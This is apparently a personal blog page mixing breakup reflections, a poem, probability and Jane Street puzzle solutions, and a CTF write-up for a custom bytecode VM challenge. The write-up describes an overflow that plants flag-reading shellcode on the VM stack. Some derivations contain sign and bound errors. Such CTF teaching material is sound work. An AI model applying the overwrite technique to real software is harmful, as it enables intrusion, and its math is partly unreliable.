kek :D

On Loss and Love

kek — Wed, 21 Jan 2026 00:00:00 GMT

Recently, I lost what I previously thought was the love of my life.
The experience changed the lens through which I view relationships and my life.
I have hesitated to post this for a long time, but this is the (unspiring) story of a lost souls first venture into love.

The beginning

They say that love always comes when you least expect it, and I have found this to be true.
I stepped into my first year of junior college just after recovering from the heartbreak of an unrequited love. Finding a relationship was the last thing on my mind.
To make matters worse, I had been brutally butchered by a barber just before my first week of school, and boy, that head of hair was definitely not helping my chances.

I first started talking to Feilin over text one day, after asking her what was probably a mathematics question.
From that day on, we started texting often. At that point in time, I had a crush on another girl in my class and therefore didn't really think much about it.
Besides, she was the type of girl to have many male friends (being in a male dominated computing class helped) and the only thing I thought about it was "dang, does this girl have no other better things to do?"

Soon after however, I had lost interest in the other girl and was a free agent.
Feilin were in the same class, H2 Project Work group and worked on the same external research project. Therefore, we had no lack of opportunity to see each other.
I remember distinctly however, the first time we spent time alone together.
The external research project had a package that required us to run a linux distro, and she had no idea how they worked and how to dual boot windows and ubuntu on her laptop.
I, ever the opportunist, offered to help her at my place.

I still remember questioning her choice of partitioning her disk into two, with her response being "my friend said that it would make it faster".
Till this day, I think she still runs that accursed setup.

Naturally, that experience was EXTREMELY awkward, but I remembered that we shared a hug before she headed home, something that I did with all my close friends at that point, but when I first hugged her, something felt off.
Something felt different about the hug - not that it was awkward, or wrong, or weird, but that it conveyed a different message.

In the weeks that passed, I wrestled much with my feelings. I had initially tossed the idea of dating her at the start, but now thoughts of it were creeping into the back of my mind.
Eventually, I went out with her a couple of times, and after she started placing her head on my shoulders during movies and lunch (cringe!) I knew that it was a matter of time before I asked her out.

Not long after, after watching Jurrasic Park at Suntec City, I eventually did ask her to be my girlfriend, whilst walking her back to HCI Boarding School.

A Short Probability Problem

kek — Mon, 26 Jan 2026 00:00:00 GMT

The problem

Given a1 ~ Unif(0,1), a2 ~ Unif(0,2), a3 ~ Unif(0,3), a4 ~ Unif(0,4) and a5 ~ Unif(0,5), what is P(a1 <= a2 <= a3 <= a4 <= a5)?

I recently saw this problem in an instagram reel, and after some help from a friend (thanks zhi!) and an hour plus of struggling with it, I finally (roughly) understand how to approach this!

Note: I am extremely unfamiliar with math in general and therefore some things were extremely foreign to me

Mistakes

I have solved a similar problem (janestreet dec 2025, writeup coming!) before where we had to calculate something like P(a1 <= a2).
One way to approach this is geometrically (groan).

As you can see, the square represents the space of all possible combinations of (a1,a2).
Therefore, if we want to find the probability that a1<=a2, we can simply take the area where a1<=a2/total area.
With this in mind, $P(a1 \leq a2) = (1/2 * 1 * 1) / 1*1 = 0.5$

Therefore, a natural follow up to having more a_x would to this thinking into a higher-dimensional space.
This 5D space would have volume 1x2x3x4x5 = 120 (a1 x a2 x a3 x a4 x a5)
Then, we should ask ourselves what hyper-volume of this space represents the set of (a1,a2,a3,a4,a5) where a1 <= a2 <= a3 <= a4 <= a5?

PS: it is probably not important to read past here if you are merely trying to understand the solution. This is more of a "for myself" section.

As a professionally terrible at geometry enjoyer, I was already getting lost here. No matter, chatgpt to the rescue!

Now, ChatGPT 5.2 thinking suggested that I start from a1 and integrate my way up to a5. Sounds reasonable.
Therefore, let $v_1(u)$ be the length of the 1D volume of choices for a1 given $a2 = u$.
Therefore, $v_n(u)$ would be the volume of the N-D volume of choices for $(a_1, a_2, ... , a_n)$ given that $a_n = u$

To find the resultant volume, we would simply evaluate $\int_0^5{v_4(u)}{du}$.

Let us now try this.
Given $a_2=u$, $a_1$ can exist in the interval [0, min(1,u)].
Therefore, $v_1(u) = \int_0^{min(1,u)}{1},{du} = min(1,u)$

and then, given that $a3 = u$ $v_2(u) = \int_0^{min(2,u)}{v_1(t)},dt$

To compute this integral, we would now have to split between the cases where $0 \leq u \leq 1$, $1 \leq u \leq 2$, $2 \leq u \leq 3$ and then for each of these cases, there are subcases for the ranges of t as well.

This quickly becomes a mess of piecewise functions and feels terrible to calculate. There has to be a better way!

The better way

Previously, we attempted to integrate from the bottom up, starting with a1 and working our way up to a5.
The problem we faced was that each function was dependent on the functions before it, and therefore dependent on the bounds of each random variable before it.
This "stacking" of piecewise functions caused an explosion in the number of terms we had to evaluate, as we had to "update" the "state" of each integral with the potential states of past integrals.

What if we try to integrate from the bottom down instead? If we start by integrating from $a_5$, which only depends on $a_4$ (as $a_4$ implicitly "encodes" the information of $a_3, a_2, a_1$, we might not need to deal with this issue)

Our goal still satyas the same, to have a 5D space which volume represents the set of all $(a_1,a_2,a_3,a_4,a_5)$, and to find the hyper-volume of the space which represents the set of $(a_1,a_2,a_3,a_4,a_5)$ where $a_1 \leq a_2\leq a_3 \leq a_4\leq a_5$.

Let us start with $a_5$.
The "length" of values that $a_5$ can take is $5 - a_4$.
This is because $0 \leq a_5 \leq 5$ and $a_4 \leq a_5$.
The alternative way to think about this is that the 1-D volume that $a_5$ can take is given by the integral
$$ \begin{aligned} &V(a_5) = \int_{a_4}^{5}{1},da_4 = 5 - a_4 \end{aligned} $$

Therefore, the 2-D volume that is given by the set of valid $(a_5,a_4)$ values is
$$ \begin{aligned} &V(a_5,a_4) = \int_{a_3}^{4}{5 - a_4},da_3 = 12 - 5a_3 + \frac{1}{2}{a_3}^2 \end{aligned} $$

This is because $0 \leq a_4 \leq 4$ and $a_3 \leq a_4$.
Therefore, by integrating the length of $a_5$ over the values of $a_4$, we can find the area.
Here is the key observation. We can say that the values of $a_n$ solely depend on the value of $a_{n-1}$! This is due to the fact that for $a_{n-1}$ to exist in the set of valid solutions, the previous criteria for $a_1,a_2,a_3$ have already been fulfilled.

Next, we find the 3-D volume that is given by the set of valid $(a_5,a_4,a_3)$ values, with the same set of reasoning as before
$$ \begin{aligned} &V(a_5,a_4,a_3) = \int_{a_2}^{3}{12 - 5a_3 + \frac{1}{2}{a_3}^2},da_2 = ... = 18 - 12a_2 + \frac{5}{2}{a_2}^2 - \frac{1}{6}{a_2}^3 \end{aligned} $$

Now, for the 4-D volume that is given by the set of valid $(a_5,a_4,a_3,a_2)$ values, with the same set of reasoning as before
$$ \begin{aligned} &V(a_5,a_4,a_3,a_2) = \int_{a_1}^{2}{18 - 12a_2 + \frac{5}{2}{a_2}^2 - \frac{1}{6}{a_2}^3},da_1 = ... = 18 - 18a_1 + 6{a_1}^2 - \frac{5}{6}{a_1}^3 + \frac{1}{24}{a_1}^4 \end{aligned} $$

And finally, for the 5-D volume that is given by the set of valid $(a_5,a_4,a_3,a_2,a_1)$ values
$$ \begin{aligned} &V(a_5,a_4,a_3,a_2,a_1) = \int_{1}^{0}{18 - 18a_1 + 6{a_1}^2 - \frac{5}{6}{a_1}^3 + \frac{1}{24}{a_1}^4},da_1 = 18 - 9 + 2 - \frac{5}{24} + \frac{1}{120} = \frac{54}{5} \end{aligned} $$

And to arrive at the final answer, $$ \begin{aligned} &P(a_5\geq a_4\geq a_3\geq a_2\geq a_1) = \frac{\frac{54}{5}}{120} = \frac{9}{100} = 0.09 = 9% \end{aligned} $$

There you have it! Hopefully this was helpful and interesting :D

Dear Favourite Stranger...

kek — Thu, 25 Dec 2025 00:00:00 GMT

Dear favourite stranger,
I have forgotten your touch, your smell, and your taste – but never your love.
You feel so far away yet still so close to my heart.
I know you once truly loved me, as I did you.
I look back with a tear, but also a smile, for the time we had was worth all this while.
Though this might be a last goodbye, your memory will last a lifetime.
Wherever you are, whenever, and with whoever, I wish you all the best.

And so, as my last painful act of love,
I open my hands.
I let you go, my dove.

Robot Javalin: Jane Street December 2025 monthly puzzle

kek — Wed, 07 Jan 2026 00:00:00 GMT

Finally another game theory based puzzle!
As usual, code can be found here but you probably won't need it this time around!

Problem Statement

It’s coming to the end of the year, which can only mean one thing: time for this year’s Robot Javelin finals! Whoa wait, you’ve never heard of Robot Javelin? Well then! Allow me to explain the rules:

It’s head-to-head. Each of two robots makes their first throw, whose distance is a real number drawn uniformly from [0, 1].
Then, without knowledge of their competitor’s result, each robot decides whether to keep their current distance or erase it and go for a second throw, whose distance they must keep (it is also drawn uniformly from [0, 1]).
The robot with the larger final distance wins.

This year’s finals pits your robot, Java-lin, against the challenger, Spears Robot. Now, robots have been competing honorably for years and have settled into the Nash equilibrium for this game. However, you have just learned that Spears Robot has found and exploited a leak in the protocol of the game. They can receive a single bit of information telling them whether their opponent’s first throw (distance) was above or below some threshold d of their choosing before deciding whether to go for a second throw. Spears has presumably chosen d to maximize their chance of winning — no wonder they made it to the finals!

Spears Robot isn’t aware that you’ve learned this fact; they are assuming Java-lin is using the Nash equilibrium. If you were to adjust Java-lin’s strategy to maximize its odds of winning given this, what would be Java-lin’s updated probability of winning? Please give the answer in exact terms, or as a decimal rounded to 10 places.

Problem Analysis

Great, another easy-ish game theory problem. Seems like this time around, we need to calculate three things

"base case" nash equilibrium strategy
fully exploitative leaked strategy
equilibrium strategy with leak

We can probably take things step by step, as we need any initial steps before we can proceed on to find the next

Base case nash equilibrium

In the base case, the game is a symmetric optimal stopping problem.
That is to say, each players will have the same strategies, with the same cutoff for their strategies.
With this crucial information in hand (that the optimal strategies will be symmetric), our lives get a whole lot easier.

Common pitfalls

A common pitfall here is to assume that this is a score optimisation problem.
That is to say, that the goal here for each players is to maximise their expected score and therefore maximise their chance of winning.

Therefore, some might attempt to reason that since the EV of a single roll is 0.5, if one rolls < 0.5, one should reroll.
Therefore, the EV would be $ E(game) = 0.5 * (0.5 + 1.0)/2 + 0.5 * 0.5 = 0.6875$
Whilst it is true that such a strategy would maximise the values of each game, it is logically flawed to extend that line of thought to assume that this also maximising the chances of winning.

I struggle to find a convincing intuition why this is not the case (if someone has one please do let me know!), but I can attempt to demonstrate why this may not be the case.
Consider the two following scenarios

Scenario A:

the player rolls a dice, and it lands on 1 with 0.2 probability and 0 with 0.8 probability
therefore, the EV (in terms of value of the roll) is 0.2

Scenario B:

the player rolls a dice, and it lands on 0.1 with 1 probability
therefore, the EV is 0.1

As one can see, the EV of scenario B is lower than that of scenario A. However, when both scenarios (strategies) are pitted against one again in this setting, scenario B will come out victorious 80% of the time.

Solving for the base case equilibrium

Therefore, we must approach this problem from a game theoretic perspective.
Hence, all we need to do is reframe our perspective of EV. Here, EV should be the probability of winning, rather than the raw score. Maximising this value will thus suffice.

We know that in equilibrium, Java-lin and Spears Robot must both act in a way that causes the other to be indifferent between actions.
Call the optimal stopping point (point where both players should reroll) k, and the value of the first roll x
Now, we know that given we first roll k, the probability of winning if we stay and reroll should be the same.

Therefore, we can construct the following set of equations
$$ \begin{aligned} &P( \text{win if reroll } | x = k) = P( \text{win if stay } | x = k) \
&P( \text{win if reroll } | x = k \cap \text{ opponent rerolls }) P( \text{opponent rerolls} ) + P( \text{win if reroll } | x = k \cap \text{ opponent keeps }) P( \text{opponent keeps} ) \
& = \
&P( \text{win if keep } | x = k \cap \text{ opponent rerolls }) P( \text{opponent rerolls} ) + P( \text{win if keep } | x = k \cap \text{ opponent keeps }) P( \text{opponent keeps} ) \
\end{aligned} $$

Pardon the formatting, but I tried to use text instead of purely symbols to keep it more readable
Now, since we know that the value of k is equal for both players, it is trivial now to substitute k in for each term of the equation and solve it.

KEKculator

kek — Sat, 26 Jul 2025 00:00:00 GMT

Intro

This is my first blog post so I thought I would keep it easily digestable :)

For this years rendition of SieberrCTF 2025, I wrote a bytevm reverse engineering/pwn challenge called "KEKculator" with the intention of allowing newer CTF players an introduction to bytevm reversing.
The challenge was used in the qualifying round, and got a total of 1 solve by @azzazo
Additionally, it was my first time writing any sort of bytevm/re/pwn challenge + I'm an re and pwn noob and thus I figured it would be a good opportunity to practice some coding.

I thought that I would approach this writeup from the perspective of creating the challenge first, then present how I envisioned someone with minimal RE experience solving it.
Hopefully this allows for better clarity :grin:

Challenge creation

Architecture

The byteVM acts like a 32-bit cpu, with a bytecode convention as follows

opcode (4 bytes)	arg1 (4 bytes)	arg2 (4 bytes)	arg3 (4 bytes)

All the values are big endian and will always be present.

Eg. if the opcode only requires arg1 and arg2, arg3 must still be provided and will simply be ignored.

The "ram"/memory is stored in a simple python list with the following structure
[
- 0:1000 -> stack
- 1001: 1001+len(code) -> code
]

The "stack" grows downward as per common convention
Additionally, the reasoning for placing the stack on top of the code is to allow for the pwn aspect of this challenge(as you'll see later)

Furthermore, there exists a bunch of standardish registers:
esp, ebp, eip, eax(used for arithmetic calls) ,edx, ecx, ebx, esi, edi

Opcodes

There are a total of 18 opcodes implemented in the byteVM, here's a quick list and a brief description of them
opcodes:

0x00 -> halt (arg1 = exit_code, arg2 = message, arg3 = 0)
0x01 -> add (arg1 = dest(register), arg2 = src1, arg3 = src2)
0x02 -> sub (arg1 = dest(register), arg2 = src1, arg3 = src2)
0x03 -> mul (arg1 = dest(register), arg2 = src1, arg3 = src2)
0x04 -> div (arg1 = dest(register), arg2 = src1, arg3 = src2)
0x05 -> test (arg1 = src1, arg2 = src2, arg3 = 0) -> clears the flags of register tes
0x06 -> jeq (arg1 = offset, arg2 = 0, arg3 = 0) -> jumps if the eq is set (tested equality)
0x07 -> jne (arg1 = offset, arg2 = 0, arg3 = 0) -> jumps if the neq flag is not set (tested inequality)
0x08 -> jgt (arg1 = offset, arg2 = 0, arg3 = 0) -> jumps if the greater than flag is set (tested greater than)
0x09 -> jlt (arg1 = offset, arg2 = 0, arg3 = 0) -> jumps if the less than flag is set (tested less than)
0x0a -> jz (arg1 = offset, arg2 = 0, arg3 = 0) -> jumps if the zero flag is set (tested equality)
0x0b -> jnz (arg1 = offset, arg2 = 0, arg3 = 0) -> jumps if the zero flag is not set (tested inequality)
0x0c -> jmp (arg1 = offset, arg2 = 0, arg3 = 0) -> jumps unconditionally
0x0d -> push (arg1 = dest(register), arg2 = value)
0x0e -> pop (arg1 = dest(register), arg2 = 0)
0x0f -> store (arg1 = src(register), arg2 - memory addr) -> stores arg1(register) into arg2(memory (stores unconditionally)
0xff -> nop (arg1 = 0, arg2 = 0, arg3 = 0) -> no operation
0xdd -> syscall (arg1(0=print, 1=read), arg2(resgiter), arg3(register))

Code structure

The full source code can be viewed here
PS: I have done my best to make it readable by adding comments, but I am not too great at writing readable code :stuck_out_tongue:
However, in the interest of keeping this digestable, I shall only provide a layout of the code.

A bunch of helper functions are defined, and individual functions are defined for each opcode.
The path to a program is passed into the class init function, which then initializes the registers in a dictionary and the memory list

Lastly, a router function is used to get the code at the current EIP(Instruction pointer), fill the arg1,2,3 registers with the correct data, call the function and corresponds to the opcode
(you may notice that I used a bunch of if loops instead of a match case switch. This is because most bytecode decompilers only support python versions that do not have the match case switch, and I wanted to introduce the participants to python bytecode reversing, but making it trivial to reverse so as to maintain the crux of the challenge)

Writing a vulneriable program

The vulnerable program that is ran serverside is a calculator program that loads the value of 1 into a register, takes in an instruction and an operand, and performs the corresponding instruction using the current value of the register and the provided operand, then saves the resultant value into the register.

When the "done" instruction is received, it stores the value of the register into the stack and prints the bytes of the value.

I was going to write the bytecode by hand initially, but due to time constraints I decided on writing an assembler to speed up this process.

with open('exploit.asm') as f:
    asm = f.readlines()

asm = [line.strip() for line in asm if line[0] != '#' and line != '\n'  ]

bytecode = b''

opcode_to_byte = {
    'halt':   0x00,
    'add':    0x01,
    'sub':    0x02,
    'mul':    0x03,
    'div':    0x04,
    'test':   0x05,
    'jeq':    0x06,
    'jne':    0x07,
    'jgt':    0x08,
    'jlt':    0x09,
    'jz':     0x0a,
    'jnz':    0x0b,
    'jmp':    0x0c,
    'push':   0x0d,
    'pop':    0x0e,
    'store': 0x0f,
    'syscall': 0xdd,
    'nop':    0xff
}

def arg_to_bytes(arg):
    if arg[:2] == '0x':
        arg = int(arg, 16)
    
    else:
        arg = int(arg.encode().hex(),16)
        
    return arg

def pad_bytes(arg):
    return arg.to_bytes(4, 'big')

for line in asm:
    opcode, arg1, arg2, arg3 = line.split(' ')
    opcode = opcode_to_byte[opcode]
    
    arg1, arg2, arg3 = arg_to_bytes(arg1), arg_to_bytes(arg2), arg_to_bytes(arg3)
    
    bytecode += pad_bytes(opcode) + pad_bytes(arg1) + pad_bytes(arg2) + pad_bytes(arg3)

with open('exploit.bin', 'wb') as f:
    f.write(bytecode)

Here is the code for the simple assembler that I wrote.

With this, I created the following assembly:

# simple program to write a string to the stack (starts from 0:1000) and then print it out



# we need to first print out the string "Welcome to KEKulator PRO!"
add edx Welc 0x0
push edx 0x0 0x0
add edx 0x6f6d6520 0x0
push edx 0x0 0x0
add edx 0x746f204b 0x0
push edx 0x0 0x0
add edx 0x454b756c 0x0
push edx 0x0 0x0
add edx 0x61746f72 0x0
push edx 0x0 0x0
add edx 0x2050524f 0x0
push edx 0x0 0x0
add edx 0x21000000 0x0
push edx 0x0 0x0
add edx 0x0 0x0
syscall 0x0 edx 0x0

# print "Your starting number: 1!"
add edx Your 0x0
push edx 0x0 0x0
add edx 0x20737461 0x0
push edx 0x0 0x0
add edx 0x7274696e 0x0
push edx 0x0 0x0
add edx 0x67206e75 0x0
push edx 0x0 0x0
add edx 0x6d626572 0x0
push edx 0x0 0x0
add edx 0x3a203121 0x0
push edx 0x0 0x0
add edx 0x0 0x0
push edx 0x0 0x0
add edx 0x1c 0x0
syscall 0x0 edx 0x0


# print "This is a blackbox so I won't tell you what to do...teehee"

add edx 0x54686973 0x0
push edx 0x0 0x0
add edx 0x20697320 0x0
push edx 0x0 0x0
add edx 0x6120626c 0x0
push edx 0x0 0x0
add edx 0x61636b62 0x0
push edx 0x0 0x0
add edx 0x6f782073 0x0
push edx 0x0 0x0
add edx 0x6f204920 0x0
push edx 0x0 0x0
add edx 0x776f6e27 0x0
push edx 0x0 0x0
add edx 0x74207465 0x0
push edx 0x0 0x0
add edx 0x6c6c2079 0x0
push edx 0x0 0x0
add edx 0x6f752077 0x0
push edx 0x0 0x0
add edx 0x68617420 0x0
push edx 0x0 0x0
add edx 0x746f2064 0x0
push edx 0x0 0x0
add edx 0x6f2e2e2e 0x0
push edx 0x0 0x0
add edx 0x74656568 0x0
push edx 0x0 0x0
add edx 0x65650000 0x0
push edx 0x0 0x0
add edx 0x38 0x0
syscall 0x0 edx 0x0

# push 1 to ecx
add ecx 0x0 0x1

# we need to accept the arithmetic instruction(add, sub, mul, div) and a number to operate on eax

# call read to read 4 bytes into edx (the instruction to run)
syscall 0x1 edx 0x0

# test for "add "
add ebx 0x61646420 0x0
test ebx edx 0x0
# if equal, jump to arithmetic function
jeq 0x8f8 0x0 0x0

# test for "sub "
add ebx 0x73756220 0x0
test ebx edx 0x0
# if  equal, jump to arithmetic function
jeq 0x928 0x0 0x0

# test for "mul "
add ebx 0x6d756c20 0x0
test ebx edx 0x0
# if  equal, jump to arithmetic function
jeq 0x958 0x0 0x0

# test for "div "
add ebx 0x64697620 0x0
test ebx edx 0x0
# if  equal, jump to arithmetic function
jeq 0x988 0x0 0x0


# test for "done"
add ebx 0x646f6e65 0x0
test ebx edx 0x0
# if  equal, jump to done function
jeq 0x9b8 0x0 0x0

# add function
# call read to read 4 bytes into edx (the value to add)
syscall 0x1 edx 0x0
add ecx ecx edx
# jump back to input function
jmp 0x7f8 0x0 0x0

# sub function
# call read to read 4 bytes into edx(the value to sub)
syscall 0x1 edx 0x0
sub ecx ecx edx
# jump back to input function
jmp 0x7f8 0x0 0x0

# mul function
# call read to read 4 bytes into edx(the value to mul)
syscall 0x1 edx 0x0
mul ecx ecx edx
# jump back to input function
jmp 0x7f8 0x0 0x0

# div function
# call read to read 4 bytes into edx(the value to div)
syscall 0x1 edx 0x0
div ecx ecx edx
# jump back to input function
jmp 0x7f8 0x0 0x0

# done function
# store the value of ecx onto the stack
store ecx 0x74 0x0
# print the value that was stored
add ecx 0x0 0x74
syscall 0x0 ecx 0x0
# halt the program
halt 0x0 0x0 0x0

PS: The keen eyed among you might have noticed that I (definitely intentionally) left out functionality to do something like mov eax 0x10.
Therefore, in order to "move" a value to a register, one must do the following add eax 0x0 <value> or similar.

The exploit

As there is a current writeup competition going on, I shall make this section purposefully vague for the time being till the deadline has been reached. Additionally, I will not include the section on how I believe a beginner contestant can solve the challenge till then.

The vulnerability of the program comes with the fact that there is no bounds check on the value in the ecx register.
Additionally, the store instruction stores a value of arbitrary size into the stack.
Therefore, if we can execute a sequence of mathematical operations such that when the store instruction is called, we can write a huge value onto the stack that

Contains some shellcode that reads the flag file and prints it (how convenient that the string "flag" is only 4 bytes!)
Overwrites the code @ the current eip to jump to the start of this shellcode
We can print out the flag and win!

I was initially left wondering on the best way to do the above, but a friend wisely suggested a loop of bitshifting 4 bytes, then adding the value that corresponds to 4 bytes that you want and so forth.
This works really well. However, we cannot bitshift 4 bytes at a time as we would require to multiply by 0x0100000000, which is a little more than the 4 bytes we are allowed.
Therefore, to keep things simple, I opted to bitshift by 3 bytes at a time. The big endianess makes this really uncomplicated and easy.

To do this, we simply multiply by 0x01000000: $0x1234 \cdot 0x01000000 = 0x1234000000$
Then, we add the value of the 3 bytes we want. We can do this for our entire payload and then call the "done" instruction and win.

In the interests of saving operations however, I opted to spam a few mul, 0xffffffff first to fill up space with "random" bytes that we won't care about.

We first create a shellcode snippet that can be used to read and print the flag:

# add "flag" to ecx
add ecx flag 0x0

# push to stack
push ecx 0x0 0x0

# flag is now at addr 0x74

add ecx 0x0 0x74
# call open syscall to read value into 
syscall 0x2 ecx ebx

# store the read value from ebx to eax
store ebx 0x100 0x0
add ebx 0x100 0x0
# call print syscall to print the value out
syscall 0x0 ebx 0x0
halt 0x0 0x0 0x0

Our payload(theoretically) will be constructed like so:

0x8c4 bytes	shellcode	jmp instruction to top of shellcode
0x74-0x938	0x938-0x9b8	0x9b8-0x9c8

Which we can then use this rather clunky solve script to solve

<redacted for now>

Revisiting the challenge from the perspective of a participant

Recon

Analysis and decompilation of the bytevm

Exploit creation

Solve script

Robot Baseball: Jane Street October 2025 monthly puzzle

kek — Tue, 04 Nov 2025 00:00:00 GMT

After a recent breakup, I needed something to distract myself and decided to work on Jane Street's puzzle of the month.

If you're just interested in the solution script, it is available here

Problem Analysis

The puzzle reads

The Artificial Automaton Athletics Association (Quad-A) is at it again, to compete with postseason baseball they are developing a Robot Baseball competition. Games are composed of a series of independent at-bats in which the batter is trying to maximize expected score and the pitcher is trying to minimize expected score.

An at-bat is a series of pitches with a running count of balls and strikes, both starting at zero. For each pitch, the pitcher decides whether to throw a ball or strike, and the batter decides whether to wait or swing; these decisions are made secretly and simultaneously. The results of these choices are as follows.

If the pitcher throws a ball and the batter waits, the count of balls is incremented by 1.
If the pitcher throws a strike and the batter waits, the count of strikes is incremented by 1.
If the pitcher throws a ball and the batter swings, the count of strikes is incremented by 1.
If the pitcher throws a strike and the batter swings, with probability p the batter hits a home run1 and with probability 1-p the count of strikes is incremented by 1.

An at-bat ends when either:

The count of balls reaches 4, in which case the batter receives 1 point.
The count of strikes reaches 3, in which case the batter receives 0 points.
The batter hits a home run, in which case the batter receives 4 points.

By varying the size of the strike zone, Quad-A can adjust the value p, the probability a pitched strike that is swung at results in a home run. They have found that viewers are most excited by at-bats that reach a full count, that is, the at-bats that reach the state of three balls and two strikes. Let q be the probability of at-bats reaching full count; q is dependent on p. Assume the batter and pitcher are both using optimal mixed strategies and Quad-A has chosen the p that maximizes q. Find this q, the maximal probability at-bats reach full count, to ten decimal places.

This is quite clearly some sort of game theory problem, in which one party seeks to minimize a particular value (num of points) and the other seeks to maximise the same value.

The problem is really wordy and is probably best displayed in some sort of table

Pitcher/Batter	Ball	Strike
Swing	+1 Strike	p: homerun / p': +1 Strike
Wait	+1 Ball	+1 Strike

Now the question we first have to ask ourselves is: is there a dominant strategy? Say p=0. Then, the pitcher would always strike as this always leads to +1 Strike, and the batter would always wait. Therefore, we would always end up in a +1 Strike and the game would end in 3 rounds with 0 points.

However, since the problem seems to imply the existence of a mixed strategy when p is set in such a way that maximises the probability of a full count, lets assume that there is no dominant strategy.

Furthermore, the optimal strategy probably depends on the state of the game. Therefore, let us begin by modelling this state of the game.

Thought process

Call the state of the game S(b,s), where b is the number of current balls and s is the number of current strikes.
Then call the expected value of each state E(S,p,x,y), where S is the state of the game, p is the probability of a homerun when we have a Strike/Swing scenario, and x and y are the probabilities of the pitcher choosing a ball and the batter choosing to wait. Alternatively, you could notate E(b,s,p,x,y) for simplicity.

The goal of the pitcher is to minimise the value of the state and the goal of the batter is to maximise it.

Now, we use some logic to "simplify" the problem.
Given some state S, lets say that for the pitcher, $ E(Ball) = 0.7 $ and $ E(Strike) = 0.8 $, where E is the expected points of a specific action.
In this scenario, one can clearly tell that the pitcher should always Ball, as this minimizes the expected points. Therefore, the pitcher should always choose to throw a Ball here.

It is often confusing to those new to game theory on why players must be indifferent between actions in a mixed, optimal strategy, but allow me to present a intuitive argument for this.
Keep in mind that a nash equilibrium strategy assumes that both players have full knowledge of the other person's strategy.
Consider the following scenario:

If the batter chooses his probability of waiting in such a way that throwing a ball is always better for the pitcher, then the pitcher will always choose a ball.
Therefore, since the batter always chooses a wait since that will mean that he will always get 1 point.
However, if the batter always chooses to wait, the pitcher is now not incentivised to choose a ball, and will therefore be more inclined to choose to strike.
Therefore, the pitcher will increase his probability of striking. In return, the batter will choose to wait more, and this "process" will happen until they eventually reach a state where the batter and striker have no preference between either action.

Therefore, at the equilibrium, the "payoff" or inversely, the "cost" of each action for a player must be the same.

This insight thus allows us to mathematically represent the optimal strategies

The value of the state E(x,y,b,s) can thus be calculated as follows
Remember that x = probability of ball, y = probability of wait, b = num of balls, s = num of strikes
$$ \begin{aligned} &E(x,y,b,s) = xy * E(x,y,b+1,s) \
&+ (1-x)y * E(x,y,b,s+1) \
&+ x(1-y) * E(x,y,b,s+1) \
&+ (1-x)(1-y) * [p * 4 + (1-p) * E(x,y,b,s+1)] \end{aligned} $$

Pitcher's equilibrium

The expected value of the pitcher choosing to throw a ball is as follows (forgive the notation)
$$ E(ball) = y * E(x,y,b+1,s) + (1-y) * E(x,y,b,s+1) $$

The expected value of the pitcher choosing to throw a strike is as follows
$$ E(strike) = y * E(x,y,b,s+1) + (1-y) * (4p + (1-p) * E(x,y,b,s+1)) $$

Additionally, we know that these two values must be equal for indifference. Therefore, $$ \begin{aligned} &y * E(x,y,b+1,s) + (1-y) * E(x,y,b,s+1) = y * E(x,y,b,s+1) + (1-y) * (4p + (1-p) * E(x,y,b,s+1)) \
&y = \frac{p(4 + E(x,y,b,s+1))}{E(x,y,b+1,s) + E(x,y,b,s+1) + p(4 - E(x,y,b,s+1))} \end{aligned} $$

Batter's equilibrium

Likewise, the expected value of the batter choosing to wait is as follows
$$ E(wait) = x * E(x,y,b+1,s) + (1-y) * E(x,y,b,s+1) $$

The expected value of the batter swinging is as follows
$$ E(swing) = x * E(x,y,b,s+1) + (1-x) * (4p + (1-p) * E(x,y,b,s+1)) $$

And therefore, $$ \begin{aligned} &x * E(x,y,b+1,s) + (1-x) * E(x,y,b,s+1) = x * E(x,y,b,s+1) + (1-x) * (4p + (1-p) * E(x,y,b,s+1)) \
&x = \frac{p(4 + E(x,y,b,s+1))}{E(x,y,b+1,s) + E(x,y,b,s+1) + p(4 - E(x,y,b,s+1))} \end{aligned} $$

Solution walkthrough

What a coincidence! It seems that the equations for both the batter's and the pitcher's optimal strategies are the same!
Furtheremore, we know that there are some terminal states of the value of a state!
Eg. $E(x,y,4,k) = 1$ and $E(x,y,m,3) = 0$ for any $k < 3$ and $m < 4$
We can then now proceed to implement this in code with some recursion

First, write the function V(b,s,p) that calculates the value of a state given b,s,p

# returns the value function for state S(b,s)
V_cache = {} # used a cache here to speed up the calculation -> we're using vanilla python w/o the aid of numpy etc which is pretty slow so this is necessary 
def V(b,s,p):
    if b == 4: # terminal state for 4 balls
        return 1 
    if s == 3: # terminal state for 3 strikes
        return 0
    key = (b, s) # cache lookup for speed
    if key in V_cache:
        return V_cache[key]
    else:
        x_val = x(b, s, p) # we will write these functions later on
        y_val = y(b, s, p)
        result = (
            x_val * y_val * V(b+1,s,p) + 
            x_val * (1 - y_val) * V(b,s+1,p) + 
            (1 - x_val) * y_val * V(b,s+1,p) + 
            4 * p * (1 - x_val) * (1 - y_val) + 
            (1 - x_val) * (1 - y_val) * (1 - p) * V(b,s+1,p)
        )
        V_cache[key] = result
        return result

Next, write functions x and y, which calculate the optimal strategies given the value functions of the next states

# returns the optimal frequency for throwing a ball
def x(b,s,p):
    return (p * (4 - V(b,s+1,p))) / (V(b+1,s,p) - V(b,s+1,p) + p * (4 - V(b,s+1,p)))

# returns the optimal frequency for waiting
def y(b,s,p):
    return (p * (4 - V(b,s+1,p))) / (V(b+1,s,p) - V(b,s+1,p) + p * (4 - V(b,s+1,p)))

Lastly, since we want to find the value of p that maximises q, the probabilities that the at-bats reach full count, write a function q, that returns the probability of reaching state S(b,s)

The formula for Q is as follows $$ \begin{aligned} &Q(b,s,p) = x(b-1,s,p) * y(b-1,s,p) * Q(b-1,s,p) + \
&x(b,s-1,p) * (1 - y(b,s-1,p)) * Q(b,s-1,p) + \
&(1 - x(b,s-1,p)) * y(b,s-1,p) * Q(b,s-1,p) + \
&(1 - x(b,s-1,p)) * (1 - y(b,s-1,p)) * (1 - p) * Q(b,s-1,p) \end{aligned} $$

Q_cache = {} # again, cache here used for speed
# returns the probability of reaching state S(b,s)
def Q(b,s,p):
    # print((b,s,p))
    if b == 0 and s == 0: # we always start at S(0,0), so we have a probability of 1 of reaching this state
        return 1
    
    if b < 0 or s < 0: # we can never reach values with b < 0 or s < 0
        return 0
    
    key = (b,s)
    if key in Q_cache:
        return Q_cache[key]
    
    else:
        res = ( 
            x(b-1,s,p) * y(b-1,s,p) * Q(b-1,s,p) +
            x(b,s-1,p) * (1 - y(b,s-1,p)) * Q(b,s-1,p) +
            (1 - x(b,s-1,p)) * y(b,s-1,p) * Q(b,s-1,p) +
            (1 - x(b,s-1,p)) * (1 - y(b,s-1,p)) * (1 - p) * Q(b,s-1,p)
        )

